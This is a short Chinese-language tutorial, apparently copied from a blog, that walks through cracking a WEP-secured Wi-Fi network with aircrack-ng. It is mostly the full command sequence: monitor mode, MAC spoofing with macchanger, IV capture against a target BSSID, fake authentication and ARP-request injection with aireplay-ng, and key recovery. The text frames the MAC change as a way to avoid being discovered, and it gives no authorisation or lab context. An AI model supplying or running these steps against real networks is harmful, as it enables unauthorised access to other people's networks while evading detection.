0x1:工具:
1.基于linux
2.网卡支持注入
3.有X terminal
4.已经安装aircrack-ng
0x2:破解目标
0x3:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
0x4:macchanger --mac 00:11:22:33:44:55 wlan0
ifconfig wlan0 up
用macchanger工具改Mac地址,防止被别人发现和方便输入 一举两得。(N900默认没有macchanger工具 要自己下载安装 你可以再源里下载或者手动下载)
0x5: airodump-ng wlan0 抓包
运行airodump-ng wlan0后:
找到破解目标的Mac地址和频道。
BSSID是Mac
-c是频道
0x6:airodump-ng --ivs -c 破解目标的频道 -w 保存的名字 --bssid 破解目标的Mac wlan0
(--ivs 只保存可用于破解的ivs数据报文,这样可以有效的缩减保存数据包大小)
运行airodump-ng --ivs -c 破解目标的频道 -w 保存的名字 --bssid 破解目标的Mac wlan0 :
0x7:aireplay-ng -1 0 -a 目标的Mac -h 00:11:22:33:44:55(自己的Mac) wlan0。 注入
运行aireplay-ng -1 0 -a 目标的Mac -h 00:11:22:33:44:55(自己的Mac) wlan0:
0x8:aireplay-ng -3 -b 目标Mac -h 00:11:22:33:44:55(自己的Mac) wlan0。对目标使用arprequet注入攻击
运行aireplay-ng -3 -b 目标Mac -h 00:11:22:33:44:55(自己的Mac) wlan0:
这个时候ivs无线数据报文的值就开始狂飙,这个取决于无线网络的环境了 越多人使用这个无线网络进行大流量的交互ivs的值就飚的越快。当data到达2万以上时 就可以开始破解了,要成功破解高强度复杂的WEP密码 大概在8万以上的ivs。
0x9:开始破解密码:aircrack-ng -P 2 名字-01.ivs
密码在:KEY FOUND! (ASCII:这里就是密码)
http://hi.baidu.com/t_soiar/blog/item/a0ad65191ff5b271f919b890.html